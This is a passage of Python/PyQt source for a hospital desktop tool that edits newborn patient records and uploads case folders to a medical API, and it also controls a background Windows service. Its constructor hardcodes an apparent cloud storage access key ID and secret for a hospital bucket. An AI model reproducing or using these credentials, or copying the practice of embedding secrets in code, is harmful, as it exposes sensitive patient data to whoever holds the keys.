##self.signal_time.emit(\"Running time:\",'1') # 发送信号\n\nclass MainWindow(QMainWindow,Ui_MainWindow,HospitalUploadProc):\n \"\"\"\n Class documentation goes here.\n \"\"\"\n def get_dataDir(self):\n if os.path.exists(os.path.join(\"C:/\",'cfg.txt')):\n return json.loads(codecs.open(os.path.join(\"C:/\",'cfg.txt'), 'r').read()).get('pa_dir')\n else:\n return os.path.dirname(os.path.realpath(__file__))\n\n def get_setTime(self):\n if os.path.exists(os.path.join(\"C:/\", 'cfg.txt')):\n temp_time=json.loads(codecs.open(os.path.join(\"C:/\", 'cfg.txt'), 'r').read()).get('run_time')\n H = int(temp_time.split(':')[0])\n M1 = int(temp_time.split(':')[1][:1])\n M2 = int(temp_time.split(':')[1][-1:])\n self.timeEdit.setTime(QtCore.QTime(H, M1, M2))\n else:\n # 设置系统的默认运行时间\n self.timeEdit.setTime(QtCore.QTime(16, 0, 0))\n\n def Get_url(self):\n if os.path.exists(os.path.join(\"C:/\", 'cfg.txt')):\n cfg = json.loads(codecs.open(os.path.join(\"C:/\", 'cfg.txt'), 'r').read())\n if 'url' in cfg.keys():\n return cfg['url']\n return 'http://api.medical.exaai.cn'\n\n def Get_Server_Status(self):\n app = ServiceManager('PythonService')\n if False == app.is_exists():\n self.statusBar.showMessage('服务未安装!')\n return\n self.statusBar.showMessage('服务的运行状态为:%s'%app.status())\n\n def __init__(self, parent=None):\n \"\"\"\n Constructor\n @param parent reference to the parent widget\n @type QWidget\n \"\"\"\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n self._runtTime = ''\n self.local = os.path.dirname(os.path.realpath(__file__))\n # self._dataDir = os.path.dirname(os.path.realpath(__file__))\n self._dataDir = self.get_dataDir()\n self.id ='LTAInP47aO9oWL93'\n self.key ='yRBFKapTmX0d4u95WD2jNtKdW88F4u'\n self.bucket ='exa-hospital'\n self._baseurl = self.Get_url()\n # self._baseurl ='http://www.xcmy.top'\n # self._baseurl ='http://39.96.42.137'\n # self._baseurl ='http://39.96.91.138:3000'\n self.UpLoad_Case_Nub = 0\n self.Pa_Info ='PatientInfo.txt'\n self.Pa_Info_path_arry = []\n self.Pa_Info_Current_Path =''\n self.Pa_Info_current_index =0\n self.SaveInfo={}\n self.CaseCount = 0\n self.File_Count = 0\n self._Flag = {\n 'allUpLoad' : False,\n 'manuUpLoad' : False,\n 'StartService': False,\n 'StopService': False,\n 'DeleteService': False,\n 'EditCase':False,\n\n }\n self.move_center()\n #禁止窗体拖动以及最小化操作\n self.setWindowFlags(QtCore.Qt.Dialog)\n self.setFixedSize(441, 484)\n self.setWindowIcon(QIcon('1.ico')) # 设置窗体标题图标\n self.get_setTime()\n self.pushButton_4.setVisible(False)\n self.pushButton_5.setVisible(False)\n self.groupBox_4.setVisible(False)\n self.radioButton_2.setChecked(True)\n # MainWindow.setWindowFlags(QtCore.Qt.WindowCloseButtonHint)\n self.textBrowser.append('案例路径为:'+self._dataDir)\n self.textBrowser.append('URL:' + self._baseurl)\n ##设置系统的默认运行时间\n #self.timeEdit.setTime(QtCore.QTime(15,0,0))\n self.Get_Server_Status()\n self.progressBar.setVisible(False)\n # '3 5 6 15 20 0'\n self.lineEdit_5.installEventFilter(self)\n self.lineEdit_3.installEventFilter(self)\n self.lineEdit_6.installEventFilter(self)\n self.lineEdit.installEventFilter(self)\n self.lineEdit_15.installEventFilter(self)\n self.lineEdit_20.installEventFilter(self)\n self.lineEdit_24.installEventFilter(self)\n self.lineEdit_7.installEventFilter(self)\n self.timeEdit.setEnabled(False)\n self.textBrowser.append(self.ReadResultInfo(os.path.join('C:/','uploadinfo')))\n\n def move_center(self):\n screen = QDesktopWidget().screenGeometry()\n form = self.geometry()\n x_move_step = (screen.width() - form.width()) / 2\n y_move_step = (screen.height() - form.height()) / 2\n self.move(x_move_step, y_move_step)\n\n\n def save_path_info(self):\n temp_dir = {\n 'pa_dir' : self._dataDir,\n 'run_time': self._runtTime,\n 'local_path':self.local,\n 'url':self._baseurl,\n }\n result = json.dumps(temp_dir)\n file1 = codecs.open(os.path.join('C:/', 'cfg.txt'), 'w')\n file1.write(result)\n file1.close()\n\n\n @pyqtSlot(QDateTime)\n def on_timeEdit_dateTimeChanged(self, dateTime):\n # self.textBrowser.append(dateTime.toString('hh:mm'))\n self._runtTime = dateTime.toString('hh:mm')\n self.save_path_info()\n\n @pyqtSlot(QTime)\n def on_timeEdit_timeChanged(self, time):\n self._runtTime = time.toString('hh:mm')\n # self.textBrowser.append('案例路径为:' + self._runtTime)\n self.save_path_info()\n\n def ManHandUpLoad(self):\n pa_info = os.path.join(self._dataDir,'PatientInfo.txt')\n if False == os.path.exists(pa_info):\n QMessageBox.critical(self, \"错误\",\n self.tr('用户选择的文件夹:{0},未包含病人信息文件:{1}'.format(self._dataDir, 'PatientInfo.txt')))\n self.statusBar.showMessage('手动上传文件失败!')\n return\n\n if False == self.Check_PatientInfo(pa_info):\n QMessageBox.critical(self, \"错误\",self.tr('案例:{0}信息不全,请点击编辑案例补充信息!'.format(pa_info)))\n self.statusBar.showMessage('手动上传文件失败!')\n return\n\n hp_id = os.path.split(self._dataDir)[1]\n # if len(hp_id) != len(def_dirname):\n # QMessageBox.critical(self, \"错误\",\n # self.tr('用户选择的文件夹:{0},文件夹命名不符合规范!请参考:{1}'.format(self._dataDir,def_dirname)))\n # self.statusBar.showMessage('手动上传文件失败!')\n # return\n\n self.statusBar.showMessage('开始上传case:%s,请稍后............' % os.path.split(self._dataDir)[1])\n temp_op_arry ={\n 'Pa_info':self.Pa_Info,\n 'baseurl':self._baseurl,\n 'Case_Path':self._dataDir,\n 'Force_flag':True\n }\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.progressBar.setVisible(True)\n self.MauUpload.setEnabled(False)\n self.statusBar.showMessage('')\n self.textBrowser.clear()\n self.thread = UploadThread(op_type='manuUpLoad',input_array=temp_op_arry)\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n def update_text(self,result):\n if self._Flag.get('manuUpLoad'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.progressBar.setVisible(False)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n if UpLoadResult.Proc_Ok == result.get(\"status\"):\n self.statusBar.showMessage('案例上传成功!')\n self.textBrowser.clear()\n else:\n self.statusBar.showMessage('案例上传失败!')\n elif 'file_count' in result.keys():\n temp = result['file_count'].split(':')\n self.progressBar.setValue((int(temp[1])/int(temp[0]))*100)\n else:\n self.textBrowser.append(result.get('info'))\n elif self._Flag.get('allUpLoad'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.progressBar.setVisible(False)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n self.statusBar.showMessage('共%d个案例,成功插入%d个案例。'%(self.CaseCount,result.get(\"status\")))\n elif 'file_count' in result.keys():\n # self.textBrowser.append(result['file_count'])\n temp = result['file_count'].split(':')\n self.progressBar.setValue((int(temp[1]) / int(temp[0])) * 100)\n elif 'case_count' in result.keys():\n self.statusBar.showMessage('共%d个案例,已处理%d个案例' % (result[\"total_case\"],result[\"case_count\"]))\n else:\n self.textBrowser.append(result.get('info'))\n elif self._Flag.get('StartService'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n if False == result.get(\"status\"):\n QMessageBox.critical(self, \"错误\",self.tr('服务启动失败!'))\n else:\n self.textBrowser.append(result.get('info'))\n\n elif self._Flag.get('StopService'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n else:\n self.textBrowser.append(result.get('info'))\n\n elif self._Flag.get('DeleteService'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n else:\n self.textBrowser.append(result.get('info'))\n\n def StartService(self):\n if 0 == self.Check_Case_Nub(self._dataDir):\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中找不到任何%s文件!请检查路径配置!' % (self._dataDir, self.Pa_Info)))\n self.statusBar.showMessage('启动服务失败!')\n return\n Case_VaildList = self.Check_CaseIdByDir(self._dataDir)\n if len(Case_VaildList):\n self.textBrowser.clear()\n for temp_case in Case_VaildList:\n self.textBrowser.append('案例文件夹:%s命名不符合规范!' % temp_case)\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例命令不符合规范,是否忽视?' % len(Case_VaildList)),\n QMessageBox.NoButton, self)\n qyes = box.addButton(self.tr(\"确定\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n case_count = self.Check_PainfoKey_ByDir(self._dataDir)\n if case_count:\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例信息不全,是否忽视?' % case_count), QMessageBox.NoButton,self)\n qyes = box.addButton(self.tr(\"确认\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_service.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_service.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_monitor.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_monitor.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n self.statusBar.showMessage('')\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.thread = UploadThread(op_type='StartService')\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n return\n\n def StopService_Temp(self):\n if False == os.path.exists(os.path.join(self.local, 'hospital_service.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_service.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_monitor.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_monitor.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n self.statusBar.showMessage('')\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.thread = UploadThread(op_type='StopService')\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n def DeleteService_Temp(self):\n if False == os.path.exists(os.path.join(self.local, 'hospital_service.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_service.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_monitor.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_monitor.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n self.statusBar.showMessage('')\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.thread = UploadThread(op_type='DeleteService')\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n def AllUpLoadProc(self):\n Case_Nub = self.Check_Case_Nub(self._dataDir)\n self.CaseCount = Case_Nub\n if 0 == Case_Nub:\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中找不到任何%s文件!' % (self._dataDir,self.Pa_Info)))\n self.statusBar.showMessage('全部上传失败!')\n return\n Case_VaildList=self.Check_CaseIdByDir(self._dataDir)\n if len(Case_VaildList):\n self.textBrowser.clear()\n for temp_case in Case_VaildList:\n self.textBrowser.append('案例文件夹:%s命名不符合规范!'%temp_case)\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例命令不符合规范,是否忽视?' % len(Case_VaildList)), QMessageBox.NoButton,self)\n qyes = box.addButton(self.tr(\"确定\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n temp_count = self.Check_PainfoKey_ByDir(self._dataDir)\n if temp_count:\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例信息不全,是否忽视?' % temp_count),QMessageBox.NoButton, self)\n qyes = box.addButton(self.tr(\"确定\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n temp_op_arry = {\n 'Pa_info': self.Pa_Info,\n 'baseurl': self._baseurl,\n 'Case_Path': self._dataDir,\n 'Force_flag': True\n }\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.progressBar.setVisible(True)\n self.statusBar.showMessage('')\n self.textBrowser.clear()\n self.thread = UploadThread(op_type='allUpLoad', input_array=temp_op_arry)\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n # for hp_temp in os.listdir(self._dataDir):\n # temp_path = os.path.join(self._dataDir, hp_temp)\n # if os.path.isdir(temp_path):\n # self.textBrowser.append('开始上传case:%s,请稍后............' % hp_temp)\n # result = self.UpLoad_Case(self.Pa_Info, self._baseurl, temp_path, True)\n #\n # self.UpLoad_Case_Nub = self.UpLoad_Case_Nub + int(result)\n # self.textBrowser.append('case:%s,上传结束!............' % hp_temp)\n # QMessageBox.information(self, \"提示\", self.tr(\"用户数据上传完成,共上传%d个数据\" % self.UpLoad_Case_Nub))\n # self.statusBar.showMessage('共计%d个案例,成功上传%d个案例!' % (Case_Nub, self.UpLoad_Case_Nub))\n\n def Init_EditCase(self,CasePaInfoPath):\n self.textBrowser.append('正在编辑' + CasePaInfoPath)\n PaInfo ={}\n self.SaveInfo.clear()\n self.lineEdit.setText('')\n self.lineEdit_2.setText('')\n self.lineEdit_3.setText('')\n self.lineEdit_4.setText('')\n self.lineEdit_5.setText('')\n self.lineEdit_11.setText('')\n self.lineEdit_6.setText('')\n self.lineEdit_15.setText('')\n self.lineEdit_20.setText('')\n self.lineEdit_21.setText('')\n self.lineEdit_22.setText('')\n self.lineEdit_24.setText('')\n self.lineEdit_25.setText('')\n self.textEdit.setText('')\n self.lineEdit_5.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_3.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_6.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_15.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_20.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_24.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_7.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n\n self.Read_PatientInfo(PaInfo,CasePaInfoPath,self.SaveInfo)\n # print(PaInfo)\n Key_arry = []\n Key_arry = PaInfo.keys()\n if 'Name' in Key_arry:\n self.lineEdit_5.setText(PaInfo.get('Name'))\n if 'Birthdate' in Key_arry:\n self.lineEdit_6.setText(PaInfo.get('Birthdate'))\n if 'ClinicDate' in Key_arry and 'ClinicTime' in Key_arry:\n self.lineEdit_19.setText(PaInfo.get('ClinicDate')+' '+PaInfo.get('ClinicTime'))\n self.lineEdit_19.setEnabled(False)\n # self.lineEdit_7.setText(PaInfo.get('Gender'))\n # self.lineEdit_7.setEnabled(False)\n if 'GA'in Key_arry:\n self.lineEdit_20.setText(PaInfo.get('GA'))\n if 'BirthWeight' in Key_arry:\n self.lineEdit_15.setText(PaInfo.get('BirthWeight'))\n if 'Phone' in Key_arry:\n self.lineEdit_3.setText(PaInfo.get('Phone'))\n if 'CorrectGA' in Key_arry:\n self.lineEdit_21.setText(PaInfo.get('CorrectGA'))\n if 'Gender' in Key_arry:\n if PaInfo.get('Gender') in ['男','女']:\n self.comboBox.setCurrentText( PaInfo.get('Gender'))\n if 'LitterIndex' in PaInfo.keys():\n if len(PaInfo.get('LitterIndex')) > 0:\n temp_str_index = PaInfo.get('LitterIndex').split()[0]\n if temp_str_index in ['单', '双','三','四','其他']:\n self.comboBox_2.setCurrentText(temp_str_index)\n temp_str = PaInfo.get('LitterIndex')\n if '双' in PaInfo.get('LitterIndex'):\n self.groupBox_4.setVisible(True)\n if '2-2' in temp_str:\n self.radioButton_3.setChecked(True)\n elif '三' in PaInfo.get('LitterIndex'):\n self.groupBox_4.setVisible(True)\n if '3-2' in temp_str:\n self.radioButton_3.setChecked(True)\n elif '3-3' in temp_str:\n self.radioButton_4.setChecked(True)\n elif '四' in PaInfo.get('LitterIndex'):\n self.groupBox_4.setVisible(True)\n if '4-2' in temp_str:\n self.radioButton_3.setChecked(True)\n elif '4-3' in temp_str:\n self.radioButton_4.setChecked(True)\n elif '4-4' in temp_str:\n self.radioButton_5.setChecked(True)\n if 'MatherName' in Key_arry:\n self.lineEdit.setText(PaInfo.get('MatherName'))\n if 'MatherID' in Key_arry:\n self.lineEdit_2.setText(PaInfo.get('MatherID'))\n if 'Home Address' in Key_arry:\n self.lineEdit_4.setText(PaInfo.get('Home Address'))\n if 'SelfId' in Key_arry:\n self.lineEdit_11.setText(PaInfo.get('SelfId'))\n if 'Pregnancy' in Key_arry:\n if PaInfo.get('Pregnancy') in ['引导产', '剖腹产']:\n self.comboBox_3.setCurrentText(PaInfo.get('Pregnancy'))\n if 'Oxygen' in Key_arry:\n if len(PaInfo.get('Oxygen')) > 0:\n if PaInfo.get('Oxygen') in ['是', '否']:\n self.comboBox_4.setCurrentText(PaInfo.get('Oxygen'))\n # self.comboBox.setCurrentText('女')\n if 'BirthHospital' in Key_arry:\n self.lineEdit_22.setText(PaInfo.get('BirthHospital'))\n if 'PhotoID' in Key_arry:\n self.lineEdit_12.setText(PaInfo.get('PhotoID'))\n if 'VisitID' in Key_arry:\n self.lineEdit_24.setText(PaInfo.get('VisitID'))\n if 'HospitalNum' in Key_arry:\n self.lineEdit_7.setText(PaInfo.get('HospitalNum'))\n if 'NativePlace' in Key_arry:\n self.lineEdit_25.setText(PaInfo.get('Native Place'))\n if 'Disease' in Key_arry:\n self.textEdit.setText(PaInfo.get('Disease'))\n if 'Other' in Key_arry:\n self.lineEdit_8.setText(PaInfo.get('Other'))\n\n def Save_CaseInfo(self,SaveInfoDict,Key,KeyName,Value):\n #空字典\n if SaveInfoDict == {}:\n self.my_print('error! Dict is null!')\n SaveInfoDict[KeyName] = Value\n return\n if isinstance(SaveInfoDict,dict):\n for temp_key in SaveInfoDict.keys():\n if Key in temp_key:\n SaveInfoDict[temp_key] = Value\n return\n SaveInfoDict[KeyName] = Value\n\n def Get_EditCase(self):\n self.Save_CaseInfo(self.SaveInfo, '母亲姓名(Mather Name)', '母亲姓名(Mather Name)', self.lineEdit.text())\n self.Save_CaseInfo(self.SaveInfo, '母亲身份证号(Mather ID)', '母亲身份证号(Mather ID)', self.lineEdit_2.text())\n self.Save_CaseInfo(self.SaveInfo, '患者电话(Phone)','患者电话(Phone)',self.lineEdit_3.text())\n self.Save_CaseInfo(self.SaveInfo, '家庭地址(Home Address)', '家庭地址(Home Address)', self.lineEdit_4.text())\n self.Save_CaseInfo(self.SaveInfo, '患者姓名(Name)', '患者姓名(Name)', self.lineEdit_5.text())\n self.Save_CaseInfo(self.SaveInfo, '身份证号(Self Id)', '身份证号(Self Id)', self.lineEdit_11.text())\n self.Save_CaseInfo(self.SaveInfo, '出生日期(Birthdate)', '出生日期(Birthdate)', self.lineEdit_6.text())\n self.Save_CaseInfo(self.SaveInfo, '患者性别(Gender)', '患者性别(Gender)', self.comboBox.currentText())\n Litter_result = ''\n if '单' in self.comboBox_2.currentText() or '其他' in self.comboBox_2.currentText():\n # self.SaveInfo['胎数(Litter Index)'] =2 self.comboBox_2.currentText()\n Litter_result = self.comboBox_2.currentText()\n elif '双' in self.comboBox_2.currentText():\n if self.radioButton_2.isChecked():\n Litter_result = '双 2-1'\n elif self.radioButton_3.isChecked():\n Litter_result = '双 2-2'\n elif '三' in self.comboBox_2.currentText():\n if self.radioButton_2.isChecked():\n Litter_result = '三 3-1'\n elif self.radioButton_3.isChecked():\n Litter_result = '三 3-2'\n elif self.radioButton_4.isChecked():\n Litter_result = '三 3-3'\n elif '四' in self.comboBox_2.currentText():\n if self.radioButton_2.isChecked():\n Litter_result = '四 4-1'\n elif self.radioButton_3.isChecked():\n Litter_result = '四 4-2'\n elif self.radioButton_4.isChecked():\n Litter_result = '四 4-3'\n elif self.radioButton_5.isChecked():\n Litter_result = '四 4-4'\n self.Save_CaseInfo(self.SaveInfo, '胎数(Litter Index)', '胎数(Litter Index)', Litter_result)\n self.Save_CaseInfo(self.SaveInfo, '出生体重(kg)(BirthWeight)', '出生体重(kg)(BirthWeight)', self.lineEdit_15.text())\n self.Save_CaseInfo(self.SaveInfo, '出生胎龄(周)(GA)', '出生胎龄(周)(GA)', self.lineEdit_20.text())\n self.Save_CaseInfo(self.SaveInfo, '矫正胎龄(周)(Correct GA)', '矫正胎龄(周)(Correct GA)', self.lineEdit_21.text())\n self.Save_CaseInfo(self.SaveInfo, '生产方式(Pregnancy', '生产方式(Pregnancy)', self.comboBox_3.currentText())\n self.Save_CaseInfo(self.SaveInfo, '吸氧史(Oxygen)', '吸氧史(Oxygen)', self.comboBox_4.currentText())\n self.Save_CaseInfo(self.SaveInfo, '家族病史(Disease)', '家族病史(Disease)', self.textEdit.toPlainText())\n self.Save_CaseInfo(self.SaveInfo, '出生医院(Birth Hospital)', '出生医院(Birth Hospital)', self.lineEdit_22.text())\n self.Save_CaseInfo(self.SaveInfo, '检查日期(ClinicDate)', '检查日期(ClinicDate)', self.lineEdit_22.text())\n self.Save_CaseInfo(self.SaveInfo, '照片编号(Photo ID)', '照片编号(Photo ID)', self.lineEdit_12.text())\n self.Save_CaseInfo(self.SaveInfo, '就诊号(Visit ID)', '就诊号(Visit ID)', self.lineEdit_24.text())\n self.Save_CaseInfo(self.SaveInfo, '住院号(HospitalNum)', '住院号(HospitalNum)', self.lineEdit_7.text())\n self.Save_CaseInfo(self.SaveInfo, '籍贯(Native Place)', '籍贯(Native Place)', self.lineEdit_25.text())\n self.Save_CaseInfo(self.SaveInfo, '其他(Other)', '其他(Other)', self.lineEdit_8.text())\n self.my_print(self.lineEdit_5.text())\n if 0 == len(self.lineEdit_5.text()):\n tmp_str = '女'\n nub_str = ' '\n if self.comboBox.currentText() in ['男']:\n tmp_str = '子'\n if len(self.SaveInfo['胎数(Litter Index)'].split(' ')) > 1:\n nub_str = self.SaveInfo['胎数(Litter Index)'].split(' ')[1]\n self.Save_CaseInfo(self.SaveInfo, '患者姓名(Name)', '患者姓名(Name)','{0} {1} {2}'.format(self.lineEdit.text(), tmp_str, nub_str))\n # self.SaveInfo = sorted(self.SaveInfo.items(), key=lambda item: item[0])\n self.my_print(self.SaveInfo)\n\n #3 5 6 15 20 0\n def Check_EditCase(self):\n result = True\n if 0 == len(self.lineEdit_3.text()):\n self.lineEdit_3.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n # if 0 == len(self.lineEdit_5.text()):\n # # self.lineEdit_5.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n #\n # self.lineEdit_5.setText()\n # result = False\n if 0 == len(self.lineEdit.text()):\n self.lineEdit.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_6.text()):\n self.lineEdit_6.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_15.text()):\n self.lineEdit_15.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_20.text()):\n self.lineEdit_20.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_24.text()) and 0 == len(self.lineEdit_7.text()):\n if 0 == len(self.lineEdit_24.text()) :\n self.lineEdit_24.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n if 0 == len(self.lineEdit_7.text()) :\n self.lineEdit_7.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n return result\n\n def Save_Case(self):\n #self.SaveInfo.clear()\n self.Get_EditCase()\n #将字典进行排序处理\n # self.my_print('保存结果!')\n result = self.ResortDict(self.SaveInfo)\n # self.my_print(result)\n try:\n temp_file = open(self.Pa_Info_Current_Path, \"w\", encoding='utf_8')\n for temp_key in result:\n temp_file.writelines(\"%s\\n\"%temp_key)\n temp_file.close()\n self.Pa_Info_current_index = self.Pa_Info_current_index + 1\n # recode_path =os.path.split(self.Pa_Info_Current_Path)[0]\n # recode_file_name =os.path.join(recode_path,'check_flag')\n # recode_file = open(recode_file_name, \"w\", encoding='utf_8')\n # temp_file.close()\n return True\n except:\n return False\n\n\n def ProcEditCase(self):\n self.Pa_Info_current_index = 0\n self.CaseCount = self.Check_Case_Nub(self._dataDir)\n if 0 == self.CaseCount:\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中找不到任何%s文件!' % (self._dataDir, self.Pa_Info)))\n self.statusBar.showMessage('请确认是否选择案例主目录文件夹路径!')\n return\n self.Pa_Info_path_arry = self.Get_PaInfo_Path(self._dataDir)\n if len(self.Pa_Info_path_arry) == 0:\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中无信息不全的案例!'% (self._dataDir)))\n return\n self.setFixedSize(1060,500)\n self.pushButton.setVisible(False)\n self.pushButton_2.setVisible(False)\n self.pushButton_4.setVisible(True)\n self.pushButton_5.setVisible(True)\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.progressBar.setVisible(False)\n self.statusBar.showMessage('共计%d个案例需要编辑。'%len(self.Pa_Info_path_arry))\n self.Pa_Info_Current_Path = self.Pa_Info_path_arry[0]\n self.Init_EditCase(self.Pa_Info_Current_Path)\n if len(self.Pa_Info_path_arry) == 1 :\n self.pushButton_4.setEnabled(False)\n else:\n self.pushButton_4.setEnabled(True)\n self.pushButton_5.setEnabled(False)\n\n #手动进行上传操作\n @pyqtSlot()\n def on_MauUpload_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key]=False\n self._Flag['manuUpLoad'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n def on_AutoUpload_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['StartService'] = True\n self.timeEdit.setEnabled(True)\n\n @pyqtSlot()\n def on_AllUpLoad_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key]=False\n self._Flag['allUpLoad'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n def on_StopService_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['StopService'] =True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n #退出按钮\n def on_pushButton_2_clicked(self):\n sys.exit(app.exec_())\n\n @pyqtSlot()\n #确认按钮\n def on_pushButton_clicked(self):\n if self._Flag.get('StopService'):\n self.StopService_Temp()\n elif self._Flag.get('allUpLoad'):\n self.AllUpLoadProc()\n elif self._Flag.get('manuUpLoad'):\n self.ManHandUpLoad()\n elif self._Flag.get('StartService'):\n self.StartService()\n elif self._Flag.get('DeleteService'):\n self.DeleteService_Temp()\n elif self._Flag.get('EditCase'):\n self.ProcEditCase()\n\n @pyqtSlot()\n # 用户案例按钮\n def on_pushButton_3_clicked(self):\n self._dataDir = QFileDialog.getExistingDirectory(self, \"选取文件夹\") # 起始路径\n self.textBrowser.append('案例路径为:' + self._dataDir)\n self.save_path_info()\n self.statusBar.showMessage('用户选择的案例路径为:%s' % self._dataDir)\n self.setFixedSize(441, 484)\n self.pushButton.setVisible(True)\n self.pushButton_2.setVisible(True)\n self.pushButton_4.setVisible(False)\n self.pushButton_5.setVisible(False)\n self.pushButton.setEnabled(True)\n 